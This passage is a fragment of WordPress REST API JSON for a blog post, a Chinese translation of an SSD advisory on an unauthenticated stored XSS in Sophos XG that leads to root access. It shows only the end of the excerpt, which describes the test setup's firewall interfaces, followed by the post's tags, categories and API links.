\u9632\u706b\u5899\u63a5\u53e3\u53ef\u4fe1 &#8211; 192.168.10.190\u7aef\u53e3A. \u9632\u706b\u5899\u63a5\u53e3\u4e0d\u53ef\u4fe1 &#8211; 192.168.0.192\u7aef\u53e3B. &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3645\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD\u5b89\u5168\u516c\u544a-Sophos XG\u4ece\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u5b58\u50a8\u578bXSS\u6f0f\u6d1e\u5230Root\u8bbf\u95ee<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[15774,17105,11851,10757,12136],"class_list":["post-11197","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-chinese-translation","tag-persistent-xss","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11197","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=11197"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11197\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11197"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11197"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11197"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}